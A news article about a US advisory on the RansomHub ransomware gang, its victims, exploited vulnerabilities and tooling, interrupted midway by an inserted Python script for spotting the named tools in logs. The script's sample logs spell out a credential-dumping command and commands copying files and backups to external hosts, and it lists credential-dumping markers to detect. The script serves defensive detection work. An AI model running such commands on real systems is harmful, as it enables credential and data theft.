# RansomHub hits 210 victims in just 6 months

## The ransomware gang recruits high-profile affiliates from LockBit and ALPHV

[Connor Jones](/Author/Connor-Jones) Fri 30 Aug 2024 // 23:55 UTC

As RansomHub continues to scoop up top talent from the fallen LockBit and ALPHV operations while accruing a smorgasbord of victims, security and law enforcement agencies in the US feel it's time to issue an official warning about the group that's gunning for ransomware supremacy.

According to the security advisory from CISA, the FBI, HHS, and the MS-ISAC, RansomHub has amassed at least 210 victims since spinning up in February this year.

That's a strong innings by anyone's estimation, let alone for a group relatively fresh off the blocks and staffed by a ragtag ensemble of affiliates poached from former leading ransomware operations.

Looking at the sprawling list of sectors the group has successfully targeted, it seems affiliates will go after anyone, including critical infrastructure and emergency services.

The purpose of the advisory is to disseminate known tactics, techniques, and procedures (TTPs) to defenders, who can then create detection rules and stop RansomHub attacks before they unfold.

As for how the affiliates tend to break in, they love a good vulnerability exploit. Most of the vulnerabilities the advisory noted as firm favorites for the gang were only a year old. However, older bugs such as CVE-2017-0144, the one that underpinned [the NSA's EternalBlue exploit](https://www.theregister.com/2017/04/14/latest_shadow_brokers_data_dump/), and 2020's [ZeroLogon](https://www.theregister.com/2020/09/24/microsoft_zerologon_in_wild/) have also been used with some success.

While monitoring network logs, defenders should keep an eye out for the usual suspects: Mimikatz for credential harvesting, and Cobalt Strike and Metasploit for moving around the network, establishing C2 infrastructure, and exfiltrating data.

Other [tools are used](https://www.theregister.com/2024/08/19/ransomhub_edrkilling_malware/) too, such as PuTTY and AWS S3 buckets for data exfil. The advisory has the full list, and because the tools and techniques differ substantially depending on the affiliate running the attack, checking them all out is always going to be a good idea.

A number of mitigations were also included in the advisory. Put simply, many if not all could be placed under the umbrella category of 'the basics': keeping systems and software up to date, segmenting networks, enforcing strong password policies, yada yada, you know the drill.

And of course, CISA is involved, so it obviously wouldn't miss a chance to plug its latest [Secure By Design initiative](https://www.theregister.com/2024/05/09/68_tech_firms_sign_cisas/).
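The tooling list above only helps once it is turned into checks against the logs a defender actually collects. What follows is an added example, not code from the advisory or from this article: a small Python triage pass over constructed process-creation and network-connection events that flags the tooling named above (Mimikatz-style credential dumping, PuTTY-family transfer tools on hosts where they are not expected, AWS CLI uploads to an unrecognised S3 bucket, unusually large outbound transfers, and the regular check-in rhythm typical of Cobalt Strike or Metasploit beacons). The log format, host names, bucket allowlist, marker strings and thresholds are all assumptions made for the example; a real deployment would take them from the advisory's indicator list and from the organisation's own asset inventory.

```python
"""Triage constructed endpoint and network log lines for the tooling named in
the RansomHub advisory coverage above. Added example, not the advisory's own
indicator list: tool names, hosts, buckets and thresholds are assumptions."""
import json
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample telemetry (newline-delimited JSON): "proc" events are
# process creations, "net" events are outbound connections with byte counts.
SAMPLE_LOGS = r"""
{"ts":"2024-08-30T10:01:02Z","type":"proc","host":"WS-017","user":"jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\Temp\\m.exe","cmd":"m.exe sekurlsa::logonpasswords"}
{"ts":"2024-08-30T10:03:40Z","type":"proc","host":"WS-017","user":"jdoe","image":"C:\\Tools\\pscp.exe","cmd":"pscp.exe -r C:\\Finance\\2024 user@203.0.113.9:/tmp/"}
{"ts":"2024-08-30T10:03:41Z","type":"net","host":"WS-017","image":"C:\\Tools\\pscp.exe","dst_ip":"203.0.113.9","dst_port":22,"bytes_out":734003200}
{"ts":"2024-08-30T10:05:00Z","type":"proc","host":"SRV-DB2","user":"svc_backup","image":"C:\\Program Files\\Amazon\\AWSCLIV2\\aws.exe","cmd":"aws s3 sync D:\\Backups s3://example-unknown-bucket/ --no-progress"}
{"ts":"2024-08-30T10:06:12Z","type":"proc","host":"JUMP-01","user":"adm_ops","image":"C:\\Program Files\\PuTTY\\putty.exe","cmd":"putty.exe -load prod-bastion"}
{"ts":"2024-08-30T10:07:30Z","type":"net","host":"WS-042","image":"C:\\Windows\\System32\\rundll32.exe","dst_ip":"198.51.100.77","dst_port":443,"bytes_out":1800}
{"ts":"2024-08-30T10:07:35Z","type":"net","host":"WS-042","image":"C:\\Windows\\System32\\rundll32.exe","dst_ip":"198.51.100.77","dst_port":443,"bytes_out":1900}
{"ts":"2024-08-30T10:07:40Z","type":"net","host":"WS-042","image":"C:\\Windows\\System32\\rundll32.exe","dst_ip":"198.51.100.77","dst_port":443,"bytes_out":1750}
""".strip()

# Assumed environment knowledge (constructed): hosts where interactive SSH
# tooling is expected, buckets the organisation owns, and rule thresholds.
SSH_ALLOWED_HOSTS = {"JUMP-01"}
KNOWN_BUCKETS = {"s3://example-corp-backups"}
SSH_TOOLS = {"putty.exe", "pscp.exe", "psftp.exe", "plink.exe"}
CRED_DUMP_MARKERS = ("mimikatz", "sekurlsa")   # binary name or module keyword
LARGE_TRANSFER_BYTES = 100 * 1024 * 1024       # 100 MiB in one connection
BEACON_MIN_HITS = 3                            # repeats before we call it periodic
BEACON_JITTER_SECONDS = 2                      # allowed spread between intervals
S3_URI = re.compile(r"s3://([^/\s]+)")


def image_name(path):
    """Basename of a Windows or POSIX path, lower-cased for matching."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def finding(host, rule, evidence):
    return {"host": host, "rule": rule, "evidence": evidence}


def check_process(ev):
    """Rules that need only a single process-creation event."""
    out, name, cmd = [], image_name(ev["image"]), ev.get("cmd", "").lower()
    if any(m in name or m in cmd for m in CRED_DUMP_MARKERS):
        out.append(finding(ev["host"], "credential-dumping tooling", ev["cmd"]))
    if name in SSH_TOOLS and ev["host"] not in SSH_ALLOWED_HOSTS:
        out.append(finding(ev["host"], "ssh transfer tool on non-admin host", ev["cmd"]))
    if name == "aws.exe" and " s3 " in f" {cmd} ":
        for bucket in S3_URI.findall(cmd):
            if f"s3://{bucket}" not in KNOWN_BUCKETS:
                out.append(finding(ev["host"], "s3 upload to unknown bucket", bucket))
    return out


def check_network(ev):
    """Rules that need only a single connection event."""
    if ev.get("bytes_out", 0) >= LARGE_TRANSFER_BYTES:
        return [finding(ev["host"], "large outbound transfer",
                        f"{ev['bytes_out']} bytes to {ev['dst_ip']}:{ev['dst_port']}")]
    return []


def check_beacons(net_events):
    """Flag a (host, image, destination) contacted repeatedly at a near-constant
    interval, the shape of Cobalt Strike/Metasploit-style C2 check-ins."""
    groups = defaultdict(list)
    for ev in net_events:
        key = (ev["host"], image_name(ev["image"]), ev["dst_ip"], ev["dst_port"])
        groups[key].append(parse_ts(ev["ts"]))
    out = []
    for (host, image, dst_ip, dst_port), times in groups.items():
        if len(times) < BEACON_MIN_HITS:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= BEACON_JITTER_SECONDS:
            out.append(finding(host, "beacon-like periodic connection",
                               f"{image} -> {dst_ip}:{dst_port} every ~{gaps[0]:.0f}s x{len(times)}"))
    return out


def triage(log_text):
    """Run every rule over newline-delimited JSON events; return the findings."""
    findings, net_events = [], []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["type"] == "proc":
            findings.extend(check_process(ev))
        elif ev["type"] == "net":
            net_events.append(ev)
            findings.extend(check_network(ev))
    findings.extend(check_beacons(net_events))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f"[{f['rule']}] {f['host']}: {f['evidence']}")
```

Run as-is it reports five findings across WS-017, SRV-DB2 and WS-042 and stays silent on JUMP-01, where PuTTY is expected. The beacon rule is the one worth tuning: a fixed jitter tolerance catches the constructed sample, but real C2 frameworks randomise their sleep, so a production version would score interval variance over a longer window rather than demand near-equal gaps, and would pair it with the allowlist-style context the other rules already use.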
It said insecure software is the root cause of many issues the recommended mitigations aimed to, well, mitigate, so ensuring security is embedded into product architecture and [mandating MFA](https://www.theregister.com/2024/07/10/snowflake_mandatory_mfa/) — ideally the phishing-resistant kind — for privileged users is imperative.

'CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics,' the [advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-242a) reads.

'By using secure by design tactics, software manufacturers can make their product lines secure "out of the box" without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.'

### Stiff competition

Given that it took four years to finally cripple LockBit, it seems RansomHub may have a disturbingly long run ahead.

Since spinning up in February as a [suspected Knight rebrand](https://www.theregister.com/2024/06/05/ransomhub_knight_reboot/), it's routinely hovering around the top spots in the monthly tables that track the number of victims claimed by ransomware operations.

It's also now the go-to choice of ransomware for sophisticated groups such as [Scattered Spider](https://www.theregister.com/2024/07/16/scattered_spider_ransom/), perhaps offering an insight into how highly regarded it is among cybercriminal elites.

Just eight months ago, RansomHub didn't exist and LockBit and ALPHV had a firm stranglehold on the ransomware market. Sure, there were serious competitors, but none operated on the same scale as the two former juggernauts.

Now, one is [hanging on by a thread](https://www.theregister.com/2024/07/31/five_months_after_lockbit/) and [the other is no more](https://www.theregister.com/2024/02/19/infosec_news_in_brief/). But here we have RansomHub vying to take that crown and cement itself as the new LockBit or ALPHV, using their old cronies to do it.

The competition, however, is much fiercer now than it was just a few months ago. The likes of [INC](https://www.theregister.com/2024/03/28/nhs_scotland_cyberattack/), [Play](https://www.theregister.com/2024/03/08/swiss_government_files_ransomware/), [Akira](https://www.theregister.com/2024/02/06/akira_and_8base_new_ransomware_research/), [Qilin](https://www.theregister.com/2024/07/05/qilin_impacts_patient/), and others are all looking to claim the top spot as their own, and all of them are posting similar numbers.

There is, though, one group that should also not be discounted, and one that was recently singled out for being far more active than its data leak site suggests.

Cisco Talos researchers published a [report on BlackByte](https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecraft-with-newly-disclosed-vulnerabilities-to-support-ongoing-attacks/) this week, finding that only around 20-30 percent of the true number of victims are posted to its leak site. The reason is undetermined.

According to the experts, BlackByte is believed to be an offshoot of Conti, which during its heyday surpassed the success of LockBit and ALPHV.

That said, despite it supposedly being headed up by cybercrime veterans, and even taking into account the victims it doesn't publicize, BlackByte is nowhere near as active as Conti once was, posting just 41 victims throughout the entirety of 2023 and just three this year.